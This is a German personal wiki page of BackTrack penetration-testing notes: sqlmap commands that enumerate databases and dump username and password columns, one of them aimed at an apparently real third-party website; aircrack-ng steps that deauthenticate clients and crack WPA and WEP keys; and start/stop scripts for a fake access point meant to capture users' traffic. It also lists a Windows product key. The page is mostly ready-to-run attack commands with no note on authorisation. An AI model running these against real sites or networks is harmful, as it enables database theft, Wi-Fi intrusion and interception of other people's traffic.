TomWiki

Benutzer-Werkzeuge

Webseiten-Werkzeuge

Zuletzt angesehen: backtrack-tutorials
backtrack-tutorials

**Dies ist eine alte Version des Dokuments!**

Inhaltsverzeichnis

BackTrack-Tutorials

BackTrack Testlab einrichten

Quelle 1: Anleitung für Testlab mit Virtualbox

Quelle 2: noch eine Anleitung zu Testlab in Virtualbox

OSX in Virtualbox installieren

Win8 Entwicklerversion installieren
Product Key: TK8TP-9JN6P-7X7WW-RFFTV-B7QPF

Win7 Aktivierung abschalten

mySQL-Injection

los gehts mit öffnem von sqlmap

und jetzt suchen wir nach einer verwundbaren Seite. der code dazu 

python sqlmap.py -u http://www.imot.ch/wordpress/?=56 --dbs

wir sehen die Datenbanken (z.B. wordpress)

jetzt gehts um die Inhalte er Datenbank, den Tabellen 

python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME --tables

nun sind die Kolonnen dran 

python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME -T TABLENAME --columns

jetzt sehen wir den Inhalt der Kolonnen (z.B. pwd, uname)

jetzt wollen wir den Inhalt lesen 

python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME -T TABLENAME -C

Link SQL-Tutorial

WLAN Testen

Tools

crunch Wordlist-Generator

Quelle: adaywithtape - gute Beispiele

Quelle: adaywithtape - aktuelle Version

crunch starten 

/pentest/passwords/crunch/crunch 4 4 -o test.txt

generiert eine Liste (test.txt) 4-stellig

Videos und Tutorials

Youtube Madbox

Wardriving-Forum - Airodump-ng

Sammlung von Videos über aircrack-ng und Ubuntu

Schnell und einfach WPA knacken

Aircrack-ng Doku-Wiki

janoweb - patches und Quellen

Verzeichnis für Dictionary

Wortlisten

WLAN WPA-Verschlüsselung

Die nachfolgenden Befehle werden mit einem BackTrack5-Live-USB ausgeführt.

aircrack-ng WLAN-Verschlüsselung cracken

mon0 aktivieren 

airmon-ng

mit Backtrack5 nicht mehr beachten 

sudo service network-manager stop
sudo service avahi-daemon stop
kill <PID of wpa_supplicant>

mit Backtrack5 nicht mehr beachten (WLAN im Monitor-Modus starten) 

airmon-ng start wlan0

Accesspoint und Client suchen 

airodump-ng mon0

ESSID BSSID-MAC STATION-MAC CHANNEL speichern

Pakete von Accespoint erfassen 

airodump-ng --bssid <BSSID MAC> -w <DATEI> -c <CHANNEL> mon0

in neuer Shell deauthentifizieren den Client für Handshake 

aireplay-ng --deauth 10 -a <BSSID 00:00:00:> -c <STATION 00:00:00> mon0

auf erster Shell auf Handshake warten, in erster Zeile ersichtlich

Jetzt cracken wir den Schlüssel 

aircrack-ng <DATEINAME> -w <WORDLIST.list>

WLAN für normalen Betrieb aktivieren 

ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up

mit Backtrack5 nicht mehr beachten (Dienste für normalen Betrieb wieder starten) 

sudo service network-manager start
sudo service avahi-daemon start

WLAN WEP-Verschlüsselung

Software installieren
sudo apt-get install aircrack-ng
Schnittstelle erkennen
ifconfig

ergibt wlan0

wlan0 runterfahren
airmon-ng stop wlan0

ifconfig wlan0 stop
wlan0 hochfahren (Monitor-Modus)
airmon-ng start wlan0
Lauschangriff starten (Überblick verschaffen)
airodump-ng wlan0

nach WEP suchen und Channel merken z.B. 6

Daten mitschreiben
airodump-ng -c 6 -w wlan --bssid 00:00:....

Daten sammeln, ca. 250'000

Datei durchsuchen / Passwort knacken
aircrack-ng -b 00:00:..... <DATEI-NAME VON VORHERIGEM PUNKT>

Titel 1

Titel 2

Titel 3

Titel 4

Titel 5

= Titel 6 =

AccessPoint erstellen

Um zu demonstrieren wie gefährlich offene WLAN-AccessPoints sein können.

Links

FAke AccessPoint

Traffic von FakeAccessPoint auslesen

Setup a fake AccessPoint

Tutorial

Als erstes installieren wir den dhcp Server:
nach dieser Vorlage Fake AP mit Skript 

$ apt-get install dhcp3-server -y

Falls noch nicht passiert, sollte ebenfalls aircrack-ng und iptables installiert werden 

$ apt-get install aircrack-ng && iptables

Die Serverkonfigurationsdatei bennen wir zwecks Backup um: 

$ mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

Dann erstellen wir eine neue Serverkonfigurationsdatei: 

$ nano /etc/dhcp3/dhcpd.conf

mit folgendem Inhalt: 

ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
subnet 172.168.2.128 netmask 255.255.255.128 {
  option subnet-mask 255.255.255.128;
  option broadcast-address 172.168.2.255;
  option routers 172.168.2.129;
  option domain-name-servers 8.8.8.8;
  range 172.168.2.130 172.168.2.140;
}

diese Schritte nur zu Beginn ausführen.

Danach mit folgenden zwei Skripten den Fake-AP ein-/ausschalten:

FakeAPstart.sh
#!/bin/bash

echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;

echo "Putting Wlan In Monitor Mode..."
airmon-ng stop wlan1 # Change to your wlan interface
sleep 5;
airmon-ng start wlan1 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e SAhotspot -c 6 mon0 & # Change essid, channel and interface
sleep 5;

ifconfig at0 172.168.2.129 netmask 255.255.255.128 up # Change IP addresses as configured in your dhcpd.conf
route add -net 172.168.2.128 netmask 255.255.255.128 gw 172.168.2.129

sleep 5;

iptables -F
iptables -t nat -F
iptables -X
iptables -t nat -X
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE # Change wlan0 to your internet facing interface
iptables -A FORWARD -i at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
FakeAPstop.sh
#!/bin/sh
killall -9 dhcpd3
killall -9 airbase-ng
iptables -F
iptables -t nat -F
iptables -X
iptables -t nat -X
echo 0 > /proc/sys/net/ipv4/ip_forward
airmon-ng stop mon0
backtrack-tutorials.1347918363.txt.gz · Zuletzt geändert: 2025/05/03 09:10 (Externe Bearbeitung)